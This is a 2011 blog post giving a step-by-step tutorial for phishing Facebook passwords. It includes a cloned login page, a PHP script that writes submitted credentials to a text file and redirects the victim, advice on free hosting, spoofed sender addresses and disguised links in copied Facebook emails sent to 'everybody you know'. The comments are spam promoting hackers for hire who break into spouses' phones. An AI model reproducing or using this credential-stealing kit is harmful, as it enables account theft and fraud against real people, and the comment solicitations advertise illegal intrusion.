Sponsors

Monday, May 16, 2011

How To Hack Facebook Account Passwords | Done Easily.

Every Body Question About how can i hack facebook? why doesn't my phisher work? how can i send my phisher?...
This is a step by step tutorial for face-book accounts.if any reader is having problem to understand this tutorial please kindly visit my another article of phishing where i  explained breifly using gmail  Click Here

...ONE...
Go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.
TWO...
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press ctrl+f and search "action=" without the quotes. you should find this
                              


The big red ring that circles the action= you have to change. You have to change it to 'action="next.php"next.php is the name which iam giving,for genuinity you can change it into facebook.php or something else but you must use this .php name everywhere when using this trick '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html


THREE...
Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this...
Quote
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
its better if you create an html page with showing some errors to trick the victim that some error has occured in the server,Please dont use facebook.com in the header because once if  the victim logged in  from the phishing page..facebook automatically shows that they have redirected from a phishing site....so please be carefull
Save this as "next.php"

Note: for security you should rename "passwords.txt" to something else.
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank...

FOUR...
Upload the 3 files to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com justfree.com or 007sites.com. When you made an account you should upload the 3 files...

FIVE...
now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like this FACEB0OK@hotmail.comor something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six...if you are not getting such emails..no need to worry..thers always a solution,you can use Hoaxmail to send fake e-mails with any name/email as senders...!

SIX...
Copy the content of an original Facebook friendship invitation email and paste it into a new mail DONT SENT YET!
remove the hyperlink from this link:http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button



Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty Good Now i believe you are ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it... 

Please post your response as comments

3 Responses to “How To Hack Facebook Account Passwords | Done Easily.”

Anonymous said...
August 16, 2018 at 6:54 PM

I suspected my wife of cheating on me but I never had any proof. This went on for months, I didn't know what to do. i was so paranoid and decided to find a solution, i saw a recommendation about a private investigator and decided to contact him. I explained the situation about my wife to him and he said he was going to help me.I gave him all the informations he required and afterwards i received all my wife’s phones Text messages and calls, I was hurt when i saw a picture of my wife and her lover. I feel so bad about infidelity. but i am glad Mr james was able to help me get all this information, you can contact him via email(worldcyberhackers@gmail.com)


Melissa said...
September 15, 2018 at 10:55 PM

My husband and i got Married last year and we have been living happily for a while. We used to be free with everything and never kept any secret from each other until recently everything changed when he got a new Job in NewYork 2 months ago. He has been avoiding my calls and told me he is working,i got suspicious when i saw a comment of a woman on his Facebook Picture and the way he replied her. I asked my husband about it and he told me that she is co-worker in his organization,We had a big argument and he has not been picking my calls,this went on for long until one day i decided to notify my friend about this and that was how she introduced me to Mr James(Worldcyberhackers@gmail.com) a Private Investigator  who helped her when she was having issues with her Husband. I never believed he could do it but until i gave him my husbands Mobile phone number. He proved to me by hacking into my husbands phone. where i found so many evidence and  proof in his Text messages, Emails and pictures that my husband has an affairs with another woman.i have sent all the evidence to our lawyer. I just want to thank Mr James for helping me because i have all the evidence and proof for my lawyer,I Feel so sad about infidelity.



Dave said...
January 5, 2021 at 1:34 PM

Hello everyone I want to introduce you guys to a group a private investigators who can help you with information you need in any situation in life and they are ready to follow you step by step until your case is cleared just contact +17078685071 and you will happily ever after
Premiumhackservices@gmail.com


All Rights Reserved Easy Hacks | Blogger Template by Bloggermint